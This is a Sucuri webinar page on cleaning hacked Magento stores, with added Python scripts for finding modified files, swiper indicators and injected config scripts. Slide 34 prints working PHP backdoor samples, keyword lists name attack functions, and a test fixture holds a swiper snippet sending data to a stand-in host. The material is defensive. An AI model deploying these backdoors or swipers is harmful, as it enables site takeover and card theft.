
Sucuri Webinar: How to Clean a Hacked Magento Website


TIP: Make sure you scroll to the last slide to view the video recording.

On Feb 22, 2017, Sucuri Incident Responder, Cesar Anjos, presented this webinar as a step by step guide on how to clean a hacked Magento website.

If your Magento website has been hacked, learn how to appropriately deal with the security incident, fix the hack, and secure your ecommerce website against future breaches.

This webinar will take place on Wednesday, Feb 22nd at 11am PST. Following his presentation, Cesar will take questions from participants. Please complete the form to register.

In this webinar you will learn how to:

- Understand if there has been a compromise - Beginner
- Determine the presence of credit card stealers - Intermediate/Advanced
- Look for the most common credit card stealers - Intermediate
- Handle potential data breaches - Intermediate
- Remove most Magento infections - Beginner

  • These are some nice tips. Apart from these, users can also try to compare and clean modifications in files and folders as mentioned here: https://www.cloudways.com/blog/recover-hacked-magento-store/

  1. How to CLEAN a Hacked Magento Site | WEBINAR | Cesar Anjos | @sucurisecurity #AskSucuri
  2. (title slide)
  3. VALENTIN VESA, Brand Evangelist - Moderator, @adspedia
  4. HOUSEKEEPING ITEMS
     ● We want to hear from you
     ● Question tab in GoToWebinar
     ● Tweet @SucuriSecurity using #AskSucuri
     ● Questions will be answered at the end
     ● All questions will receive a response
     ● Video and slides coming in a few days
     ● Please share this content with other website owners
  5. CESAR ANJOS, Security Analyst / Incident Responder at Sucuri
  6. Porto, Portugal
  7. What to expect from this webinar
     ● Understanding if there may have been some compromise
     ● How to assess if there may be any credit card stealers on the site
     ● How to look for the most common types of credit card stealers
     ● How to get rid of most infections without actually having much technical knowledge
  8. sucuri.net/guides: step-by-step walkthroughs for popular CMS platforms and website security issues. Get Instructions
  9. Data stealer malware
     ● Biggest enemy of Magento installations.
     ● Confirmation of a breach may require cooperation with authorities.
     ● Advisable to alert customers, as they may not (yet) have been affected by it.
  10. Overview
     ● Looking for signs of compromise
     ● Finding the malware
     ● Clean the infection and wipe its remains
     ● What now?
  11. Understanding data breach implications
     If any compromise happens, be sure to make a full backup of:
     • Server log files
     • All files pertaining to the site
     • Database
     Having a data breach on your website affects the website, its owner, and its users. The website owner has the responsibility to investigate any suspicion of compromise and keep a record of all findings. Any data stolen by the attackers is usually used within the first 12 hours after the theft. In some cases it may also be kept for later use, or sold.
  12. LOOKING FOR SIGNS OF COMPROMISE: What are some of the indicators that your website has been compromised?
  13. Indicators of compromise:
     ● Customers reporting strange behavior on your site
     ● Checkout process acting oddly
     ● Customers complaining that their data was stolen after buying on your website
     ● External scanners detecting some malware or a blacklist
     ● Unauthorized accesses or changes
     ● You just spot something strange, such as a defacement
  14. Dialog with customers
     What they report:
     ● Data being stolen
     ● Redirects
     ● Pop-ups
     ● Alert messages
     What you need to verify:
     ● When exactly did the visit and the theft occur
     ● What browser/antivirus/OS/platform
     ● Were any purchases done on other websites
     ● Detailed explanation of what happened
  15. Abnormal checkout behavior
     ● Redirects
     ● Pop-ups
     ● Strange files being loaded on the page
     ● Payments going to someone else's account
     ● Just doesn't work
     Ensuring that the entire flow keeps its integrity is very important.
  16. (screenshot slide)
  17. Using a virtual credit card
     ● Virtual credit cards have a spending limit and usually a very short expiration date
     ● Most banks across the world offer such a service
     ● Low risk if stolen
     ● Can use a pre-paid or debit system
     ● No direct relation between the card and your identity
     ● May have a per-card cost, usually $1.
  18. Scan your site
     ● Sucuri SiteCheck - sitecheck.sucuri.net
     ● Hypernode's MageReport - magereport.com
     ● Magescan - magescan.com
     ● Google's VirusTotal - virustotal.com
  19. SiteCheck
     ● Checks for blacklists
     ● Scans for multiple kinds of malware within the site
     ● Provides immediate insight on what was detected
  20. MageReport
     ● Checks for missing patches or vulnerable elements
     ● Checks for certain specific malware types that affect Magento environments
  21. VirusTotal: checks for blacklists on multiple providers
  22. Blacklist: Google's blacklist is the most damaging blacklist. Blacklisted websites lose about 95% of traffic.
  23. Modus operandi of credit card swipers
     Sends the data to an external domain:
     ● Typically JavaScript
     ● Can work based on the current page, e.g. "firecheckout"
     ● Can be present in PHP files that directly handle checkouts
     ● Gets cached easily by Magento
     Stores the data in your domain's files:
     ● Typically stored inside /media
     ● Usually disguises itself as an image or a file with no extension
     ● File size grows over 3 MB extremely fast
     ● Can only be inside PHP files
  24. FINDING THE MALWARE: How can the malware be located?
  25. Focused analysis
     ● Needle in a haystack
     ● Start by focusing on what you already know
     ● Attempting to establish a timeframe is important in data theft cases
     ● Look for what else may be present
  26. Check modified files
     ● Using the diff command to compare with a clean version
     ● Checking for files modified within the last few days if you suspect the compromise was recent
     ● Try Amasty's free Modified Core Files reporting tool: https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty
  27. Diff command
       $ mkdir magento-2.1.3
       $ cd magento-2.1.3
       $ wget https://github.com/magento/magento2/archive/2.1.3.tar.gz
       $ tar -zxvf 2.1.3.tar.gz
       $ diff -r magento2-2.1.3 ../public_html
     (The GitHub archive unpacks into a magento2-2.1.3/ directory, and public_html sits one level above the working directory created in the first step.)
     ● Has to be run through SSH.
     ● Useful to get a direct comparison of what is different between two sets of folders.
     ● If the comparison is done with a freshly downloaded installation, any modules that have been installed by the owner have to be compared separately.
     ● Can also be used to compare the current live version with a backup to get a direct result of what is different.
  28. Files modified recently
       $ find ./ -type f -mtime -15
     Tells what files were modified in the last 15 days
       $ find ./ -type f -mtime -30
     Tells what files were modified in the last 30 days
     ● This gives a clear indication of what files have been modified in the timeframe specified.
     ● If you have a clear date of when the compromise might have happened, this is a great starting point.
  29. Pro tip - check your modified files
     ● Look for files bigger than 3 MB, as they may store customers' stolen data:
       $ find . -type f -size +3M
     ● Use Sucuri's Backup service as an integrity records keeper
  30. Audit users list
     ● Any unfamiliar users must be removed
  31. Functions/code most used by malware that steals credit card info/logins. Search for common swiper functions/code:
     ● <script (with inclusion of an external file)
     ● http.open
     ● http.send
     ● this["eval"]
     ● fwrite
     ● file_put_contents
     ● FILE_APPEND
     ● mail(
     ● curl
  32. Example swipers in app/code/core/Mage/Checkout/controllers/OnepageController.php
  33. Search for common backdoor functions/code:
     ● assert
     ● stripslashes
     ● preg_replace (with /e)
     ● move_uploaded_file
     ● strrev
     ● file_get_contents
     ● encodeURI
     ● strtr
     ● base64
     ● str_rot13
     ● gzuncompress
     ● gzinflate
     ● curl_exec
     ● exec
     ● create_function
     ● wget
     ● system
  34. Common backdoors
       <?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST['gTOM'])/*tC*/;exit;}?>
       <?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function _BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){ @$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}}
       <?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}
       <?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?>
       if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }
       ${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'
  35. Check your site's header and footer areas. Footer and header areas are a prime target for attackers because they load throughout the site.
  36. (screenshot slide)
  37. (screenshot slide)
  38. Check with an outside expert: consult directly with security experts when in doubt, or if you just need assistance.
  39. CLEAN THE INFECTION AND WIPE ITS REMAINS: How to effectively get rid of Magento's most common infections
  40. Before you attempt to fix anything
     ● Ensure that you have performed a full backup of files and database
     ● Store them in a safe location
     ● Preferably import your website into a temporary environment
     ● Place your website in maintenance mode, if required
     ● Contact authorities if you are a big store and there was any data theft
  41. Fix hacked files
     ● Search the files for any malware indication you may have obtained
     ● Inspect the modified files that were discovered by the investigation
     ● Restore those files to a known, legitimate state from official sources
     ● Googling parts of suspicious code may help with cleanup
     ● Remove any suspicious code
     ● Test the site to ensure everything still works as it should
  42. Suspicious code
     ● Sometimes code may look suspicious because it is encoded, but many modules have their code encoded to prevent it from being stolen.
     ● The modules must be individually compared with their original version.
     ● Some online tools help decode the remaining code:
       ● ddecode.com/phpdecoder
       ● unphp.net/
       ● jsbeautifier.org/
  43. Using ddecode.com
  44. Using unphp.net
  45. Database infections
     ● Ensure that you have a full backup before any operation.
     ● They can usually be cleaned directly through the backend of the site
     ● Attackers usually infect the core_config_data table, more specifically the records design/head/includes and design/footer/absolute_footer
  46. Tidying up
     ● Reset user passwords
     ● Change cPanel or FTP/SFTP credentials
     ● Review who has access to what
     ● Clear caches (very important step)
     ● Fix any malware warnings or blacklists
  47. ALL CLEAN, WHAT NOW?
  48. Steps to take
     ● Ensure all security patches are applied
     ● Have a backup system in place
     ● Scan computers that access the backend
     ● Add extra control/protection mechanisms to the site
     ● Take every precaution to ensure that all vulnerable areas are secure or patched, such as /downloader
     ● Change the backend admin area URL
     ● Make regular purchases on your own site to ensure its integrity (using virtual credit cards)
  49. Useful extensions/services to have in place
     ● Sucuri Firewall
     ● MageFirewall Security
     ● Nexcess Sentry Two-Factor Authentication
     ● miniOrange Two-Factor Authentication
     ● Admin Actions Log extension (if there are various admin users)
  50. You have to assume the attackers will be back
     ● Keep all accesses filtered and monitored
     ● Keep up with security updates
     ● Prepare an incident response plan with your team - https://github.com/talesh/response
     ● Ensure that the backup system works when needed; test by restoring it in a separate location and verify that it works
  51. Website Firewall
  52. Tweet us any time with your questions @SucuriSecurity using #AskSucuri. THANK YOU. Time for Questions
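Slides 27 to 29 give the diff and find commands for spotting recently modified and oversized files, and slide 23 describes swiper dump files hiding under /media as images or extension-less files. The script below is an added example, not tooling from the webinar or from Sucuri: it performs those three checks in one pass over a constructed sample tree (mtime window, the 3 MB threshold, and PHP open tags inside media/ files that claim to be images or carry no extension). Every path in the sample tree is hypothetical, and the fixed NOW timestamp exists only so the sample behaves the same on every run.

```python
import os
import tempfile
from dataclasses import dataclass, field

NOW = 1_700_000_000.0          # fixed "current time" so the constructed sample behaves the same on every run
SIZE_LIMIT = 3 * 1024 * 1024   # the 3 MB threshold the slides give for swiper dump files
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".ico", ".svg"}


@dataclass
class TriageReport:
    recently_modified: list = field(default_factory=list)   # find ./ -type f -mtime -N
    oversized: list = field(default_factory=list)           # find . -type f -size +3M
    disguised_media: list = field(default_factory=list)     # PHP under media/ named like an image, or with no extension


def has_php_tag(path, head=4096):
    """True if the first bytes of the file carry a PHP open tag; a real image never does."""
    with open(path, "rb") as fh:
        return b"<?php" in fh.read(head)


def triage(root, days=15, now=NOW):
    """Walk the store root once and collect the three indicators from slides 23 and 27-29."""
    cutoff = now - days * 86400
    rep = TriageReport()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            st = os.stat(path)
            if st.st_mtime >= cutoff:
                rep.recently_modified.append(rel)
            if st.st_size > SIZE_LIMIT:
                rep.oversized.append(rel)
            ext = os.path.splitext(name)[1].lower()
            if rel.startswith("media/") and (ext == "" or ext in IMAGE_EXTS) and has_php_tag(path):
                rep.disguised_media.append(rel)
    for lst in (rep.recently_modified, rep.oversized, rep.disguised_media):
        lst.sort()
    return rep


def build_sample_tree():
    """Constructed miniature store tree (hypothetical paths, not a real Magento install)."""
    root = tempfile.mkdtemp(prefix="magento-triage-")

    def put(rel, data, age_days, sparse_size=None):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
            if sparse_size:
                fh.truncate(sparse_size)   # sparse file: a large st_size without writing 3 MB of data
        stamp = NOW - age_days * 86400
        os.utime(path, (stamp, stamp))

    put("app/etc/local.xml", b"<config/>", 90)                            # untouched for months
    put("media/catalog/product/logo.jpg", b"\xff\xd8\xff\xe0JFIF", 90)    # genuine image bytes
    put("skin/frontend/default/default/js/checkout.js", b"var x=1;", 2)  # edited two days ago
    put("media/tmp/cache.gif", b"<?php /* dump */", 1, SIZE_LIMIT + 1)   # PHP in a .gif, and over 3 MB
    put("media/uploads/data", b"<?php // collector", 3)                  # no extension, PHP inside
    return root


if __name__ == "__main__":
    report = triage(build_sample_tree())
    for label, items in vars(report).items():
        print(f"{label}:")
        for item in items:
            print(f"  {item}")
```

Run against a real store root with `triage("/path/to/public_html", days=30)` once you have a suspected compromise date; the three lists overlap deliberately, since a file that is recent, oversized and a PHP-in-image at the same time is the strongest candidate for a swiper's dump file.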
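Slides 31 and 33 list the functions and code fragments most often seen in swipers and backdoors, and slide 42 warns that legitimate modules also use encoding. The scanner below is an added example, not the webinar's own tooling: it turns those lists into weighted regexes and scores three constructed files, two assembled from fragments of the slide 34 samples and one ordinary-looking helper module. The weights and the review threshold are assumptions of this example, chosen so that a single high-confidence indicator (or several medium ones together) flags a file for manual review while the helper's legitimate file_put_contents and base64 calls score low. File names are hypothetical.

```python
import os
import re
from dataclasses import dataclass, field

# (name, weight, pattern): the function/code list from slides 31 and 33 as regexes.
# Weight 3 = almost never legitimate in store code; 1 = common in ordinary modules too.
INDICATORS = [
    ("external <script src>", 2, r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//"),
    ("http.open / http.send", 2, r"\bhttp\.(?:open|send)\s*\("),
    ('this["eval"]', 3, r"\bthis\s*\[\s*['\"“”]eval['\"“”]\s*\]"),
    ("fwrite / file_put_contents", 1, r"\b(?:fwrite|file_put_contents)\s*\("),
    ("FILE_APPEND", 1, r"\bFILE_APPEND\b"),
    ("mail(", 1, r"\bmail\s*\("),
    ("curl_*", 1, r"\bcurl_(?:init|setopt|exec)\s*\("),
    ("assert", 3, r"\bassert\s*\(|['\"]assert['\"]"),
    ("preg_replace with /e", 3, r"['\"]/[^'\"\n]*/e['\"]"),
    ("superglobal called as a function", 3, r"\$_(?:REQUEST|POST|GET|COOKIE)\s*\[[^\]]*\]\s*\("),
    ("eval", 3, r"\beval\s*\("),
    ("base64 / str_rot13 / strrev / strtr", 1, r"\b(?:base64_(?:en|de)code|str_rot13|strrev|strtr)\s*\("),
    ("gzinflate / gzuncompress", 2, r"\b(?:gzinflate|gzuncompress)\s*\("),
    ("exec / system / create_function", 2, r"\b(?:exec|system|create_function)\s*\("),
    ("move_uploaded_file / file_get_contents / stripslashes", 1, r"\b(?:move_uploaded_file|file_get_contents|stripslashes)\s*\("),
    ("encodeURI", 1, r"\bencodeURI(?:Component)?\s*\("),
]
COMPILED = [(name, weight, re.compile(pat, re.I)) for name, weight, pat in INDICATORS]
REVIEW_SCORE = 6   # assumption: several medium indicators together also earn a manual look


@dataclass
class Finding:
    name: str
    hits: list = field(default_factory=list)   # indicator names that matched, in INDICATORS order
    score: int = 0
    suspicious: bool = False


def scan_source(name, text):
    """Score one file's text; each indicator counts once no matter how often it occurs."""
    f = Finding(name)
    for ind_name, weight, rx in COMPILED:
        if rx.search(text):
            f.hits.append(ind_name)
            f.score += weight
            if weight == 3:
                f.suspicious = True
    if f.score >= REVIEW_SCORE:
        f.suspicious = True
    return f


def scan_tree(root, exts=(".php", ".phtml", ".js", ".html", "")):
    """Run scan_source over the text-like files under root; returns only files with at least one hit."""
    out = []
    for dirpath, _dirs, names in os.walk(root):
        for n in names:
            if os.path.splitext(n)[1].lower() not in exts:
                continue
            path = os.path.join(dirpath, n)
            with open(path, "rb") as fh:
                text = fh.read().decode("utf-8", "replace")
            f = scan_source(os.path.relpath(path, root), text)
            if f.hits:
                out.append(f)
    return out


# Constructed samples: the first two reuse fragments of the slide 34 samples, the third is a normal helper.
SAMPLES = {
    "skin/frontend/default/default/js/checkout.js": (
        'document.write(\'<script src="https://stats.example.invalid/j.js"></script>\');\n'
        'http.open("POST", "https://stats.example.invalid/c.php", true);\n'
        'http.send(encodeURI(payload));\n'
        'this["eval"](d);\n'
    ),
    "media/tmp/1.gif": (
        "<?php if(isset($_REQUEST['gTOM'])){$f=\"assert\";$G=$f($_REQUEST['gTOM']);exit;}\n"
        'if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}\n'
    ),
    "app/code/local/Vendor/Module/Helper/Data.php": (
        "<?php\n"
        "class Vendor_Module_Helper_Data extends Mage_Core_Helper_Abstract {\n"
        "    public function log($line) {\n"
        "        file_put_contents(Mage::getBaseDir('log') . '/vendor.log', $line . PHP_EOL, FILE_APPEND);\n"
        "    }\n"
        "    public function inlineImage($path) {\n"
        "        return 'data:image/png;base64,' . base64_encode(file_get_contents($path));\n"
        "    }\n"
        "}\n"
    ),
}


def scan_samples():
    return {name: scan_source(name, text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for f in scan_samples().values():
        flag = "REVIEW" if f.suspicious else "low"
        print(f"{flag:6} score={f.score:2} {f.name}: {', '.join(f.hits)}")
```

The helper module lands on four indicators yet stays below the review line, which is the point of weighting: a grep for `base64` or `file_put_contents` alone would list half of a store's extensions, so low-weight hits are only a reason to compare the module against its original copy, exactly as slide 42 advises.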
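Slide 45 names the core_config_data table and its design/head/includes and design/footer/absolute_footer records as the usual database injection points. The script below is an added example, not from the webinar: it runs the SELECT a responder would issue against those two records and reports script tags whose host is not one of the store's own, or which carry inline code rather than a src attribute. The table is stood up in SQLite with constructed rows so the example runs offline (a real store uses MySQL, and the SELECT is the same), and the allowlisted host shop.example.test is an assumption of the example.

```python
import re
import sqlite3
from dataclasses import dataclass
from urllib.parse import urlparse

# The two records slide 45 names as the usual injection points.
WATCHED_PATHS = ("design/head/includes", "design/footer/absolute_footer")
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


@dataclass
class ConfigFinding:
    path: str
    scope: str
    scope_id: int
    kind: str      # "external_script" (host not allowlisted) or "inline_script" (code, not a src)
    detail: str


def audit_design_records(conn, store_hosts):
    """Report script tags in the watched core_config_data records that do not belong to the store."""
    rows = conn.execute(
        "SELECT scope, scope_id, path, value FROM core_config_data "
        "WHERE path IN (?, ?) ORDER BY path, scope, scope_id",
        WATCHED_PATHS,
    ).fetchall()
    findings = []
    for scope, scope_id, path, value in rows:
        for m in SCRIPT_TAG.finditer(value or ""):
            attrs, body = m.group(1), m.group(2)
            src = SRC_ATTR.search(attrs)
            if src:
                # relative paths have no host and load from the store itself; any other host must be allowlisted
                host = urlparse(src.group(1)).netloc.lower()
                if host and host not in store_hosts:
                    findings.append(ConfigFinding(path, scope, scope_id, "external_script", host))
            elif body.strip():
                findings.append(ConfigFinding(path, scope, scope_id, "inline_script", body.strip()[:60]))
    return findings


def build_sample_db():
    """In-memory stand-in for core_config_data with constructed rows (hypothetical hosts and values)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE core_config_data "
        "(config_id INTEGER PRIMARY KEY, scope TEXT, scope_id INTEGER, path TEXT, value TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_config_data (scope, scope_id, path, value) VALUES (?, ?, ?, ?)",
        [
            ("default", 0, "design/head/includes",
             '<link rel="stylesheet" href="/skin/frontend/default/default/css/custom.css" />\n'
             '<script type="text/javascript" src="https://shop.example.test/js/theme.js"></script>'),
            ("stores", 1, "design/head/includes",
             '<script type="text/javascript" src="https://cdn-stats.example.invalid/api.js"></script>'),
            ("default", 0, "design/footer/absolute_footer",
             "<script>/* constructed inline snippet */ var a = 1;</script>"),
            ("default", 0, "general/store_information/name", "Constructed Store"),
        ],
    )
    return conn


if __name__ == "__main__":
    for f in audit_design_records(build_sample_db(), {"shop.example.test"}):
        print(f"{f.kind:16} {f.path} scope={f.scope}/{f.scope_id}: {f.detail}")
```

The store-scope row is the one to notice: an injection often sits only at the `stores` or `websites` scope, where the admin Design configuration shows it only after switching scope, so a query that covers every scope of both records is more reliable than eyeballing the default view in the backend. Finish, as slide 46 says, by clearing the caches, since Magento serves the old head and footer blocks until they are rebuilt.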
